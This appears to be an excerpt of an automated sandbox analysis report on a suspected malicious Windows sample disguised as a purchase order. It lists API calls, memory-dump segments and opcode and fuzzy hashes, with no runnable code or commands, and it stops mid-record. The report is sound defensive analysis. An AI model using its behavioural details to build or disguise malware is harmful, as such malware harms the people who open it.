                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$InformationVolume
                                  • String ID: \VH
                                  • API String ID: 2507767853-234962358
                                  • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                  • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                  • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                  • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$InformationVolume
                                  • String ID: \VH
                                  • API String ID: 2507767853-234962358
                                  • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                  • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                  • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                  • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                  APIs
                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                  • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: msctls_trackbar32
                                  • API String ID: 3850602802-1010561917
                                  • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                  • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                  • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                  • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                  • String ID: crts
                                  • API String ID: 943502515-3724388283
                                  • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                  • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                  • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                  • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ErrorMode$LabelVolume
                                  • String ID: \VH
                                  • API String ID: 2006950084-234962358
                                  • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                  • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                  • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                  • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • GetMenuItemInfoW.USER32 ref: 00449727
                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                  • DrawMenuBar.USER32 ref: 00449761
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw_malloc
                                  • String ID: 0
                                  • API String ID: 772068139-4108050209
                                  • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                  • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                  • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                  • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcscpy
                                  • String ID: 3, 3, 8, 1
                                  • API String ID: 3469035223-357260408
                                  • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                  • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                  • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                  • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                  • API String ID: 2574300362-3530519716
                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCreateFile
                                  • API String ID: 2574300362-275556492
                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpSendEcho
                                  • API String ID: 2574300362-58917771
                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 2574300362-4033151799
                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                  APIs
                                  • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                  • __itow.LIBCMT ref: 004699CD
                                    • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                  • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                  • __itow.LIBCMT ref: 00469A97
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$__itow
                                  • String ID:
                                  • API String ID: 3379773720-0
                                  • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                  • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                  • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                  • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 00449A4A
                                  • ScreenToClient.USER32(?,?), ref: 00449A80
                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$ClientMoveRectScreen
                                  • String ID:
                                  • API String ID: 3880355969-0
                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                  • String ID:
                                  • API String ID: 2782032738-0
                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                  APIs
                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                  • GetWindowRect.USER32(?,?), ref: 00441722
                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Rect$BeepClientMessageScreenWindow
                                  • String ID:
                                  • API String ID: 1352109105-0
                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                  APIs
                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                  • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                  • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                  • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                  • String ID:
                                  • API String ID: 3321077145-0
                                  • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                  • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                  • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                  • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
